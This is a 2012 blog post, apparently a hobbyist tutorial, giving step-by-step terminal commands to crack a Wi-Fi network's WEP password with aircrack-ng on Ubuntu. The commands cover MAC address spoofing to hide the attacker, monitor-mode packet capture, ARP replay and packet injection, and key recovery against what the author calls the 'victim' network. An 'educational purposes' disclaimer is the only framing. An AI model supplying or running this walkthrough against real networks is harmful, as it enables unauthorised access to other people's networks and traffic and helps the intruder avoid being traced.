Tuesday, April 17, 2012

Hack a Wi-Fi Network’s WEP Password with Linux

I started my internship program this month so I don't find much time to spend writing long articles. So I thought to show how to crack a Wi- Fi Network's WEP password. Again I must say at the beginning that I show this for educational purposes. So if you hack someones Wi-Fi network with this please take their written authority. And do on your own risk :)

This hack only works for WEP passwords. So the victim should have used WEP in their Wi-Fi network. For other authentication methods like WPA or WPA2 are also breakable. There are tools out there to hack WPA2 authentication also but that takes time and long process than this I will consider posting an article on that later. So lets see how to do the hack.

Do do this hack in the way I am going to describe you have to have Linux operating system. I would recommend you to have Ubuntu. Specialty with Ubuntu is its more user frendly and the terminal commands I will give will work on Ubuntu (commands like apt-get may change in other Linux distributions). And I take the assumption that you are familiar with Linux operating systems. (If you find any difficulty please ask)

Below are the steps:-
Use terminal and grant user super user or administrator rights. User can get it with su command or sudo bash command

1. Install Aircrack-ng (This is the tool used to crack the wifi. This tool does not come with Ubuntu hence you have to install it on terminal)
        apt-get install aircrack-ng   (Update Ubuntu before you use this command
apt-get update.)

2. Run the following to get a list of your network interfaces.

3. Stop running Wireless interfaces.
     airmon-ng stop (interface)
     ifconfig (interface) down (We stop running wireless interface to change the MAC address of the interface)

4. Change the MAC Address of the wireless interface.
     macchanger --mac 00:11:22:33:44:55 (interface) (You can add any MAC address here.We change the MAC address for security reasons this step is recommended but not essential)

5. Start monitoring the packets.
     airmon-ng start (interface)

6. Dumps the packets. (You have to keep running the result of previous command and for this command open new terminal.We have to dump packets into a file so we can use that file when cracking the password)
     airodump-ng -c (channel) -b (bssid) -w (file name) (interface) (Channel and BSSID can be taken from the result of airmon-ng start (interface) command)

7. Creating Traffic (You have to keep running previous two terminals and open a new terminal and use following command to boost up the traffic. This is useful when you have only one station to communicate with the router. This boost up the traffic so it will capture more data).
         aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)

8. Replay attack to fast the hack. (Open a new terminal for this command. This command is also for boosing up the hack with ARP requests)
         aireplay-ng -2 -p 0841 -c (dmac) -b (bssid) (interface)

9. Wait till Data section exceed at least 10,000 (number of data gathering change according to the size of the WEP key) in airmon-ng terminal and then hack for the key with following command.
     aircrack-ng -b (bssid) (file name-01.cap)

After executing this command you will get the WEP password of thevictim Wi-Fi network.


No comments:

Post a Comment